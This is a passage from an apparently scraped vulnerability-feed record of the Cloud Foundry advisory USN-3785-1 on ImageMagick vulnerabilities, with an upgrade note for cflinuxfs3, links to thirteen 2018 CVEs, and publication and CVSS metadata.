cflinuxfs3 version 0.28.0 or later.\n\n# References\n\n * [USN-3785-1](<https://usn.ubuntu.com/3785-1>)\n * [CVE-2018-14434](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14434>)\n * [CVE-2018-14435](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14435>)\n * [CVE-2018-14436](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14436>)\n * [CVE-2018-14437](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14437>)\n * [CVE-2018-14551](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14551>)\n * [CVE-2018-16323](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16323>)\n * 
[CVE-2018-16640](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16640>)\n * [CVE-2018-16642](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16642>)\n * [CVE-2018-16643](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16643>)\n * [CVE-2018-16644](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16644>)\n * [CVE-2018-16645](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16645>)\n * [CVE-2018-16749](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16749>)\n * [CVE-2018-16750](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16750>)\n", "modified": "2018-10-09T00:00:00", "published": "2018-10-09T00:00:00", "id": "CFOUNDRY:D716827DA44D41333F3C4C92A77A0B32", "href": "https://www.cloudfoundry.org/blog/usn-3785-1/", "title": "USN-3785-1: ImageMagick vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}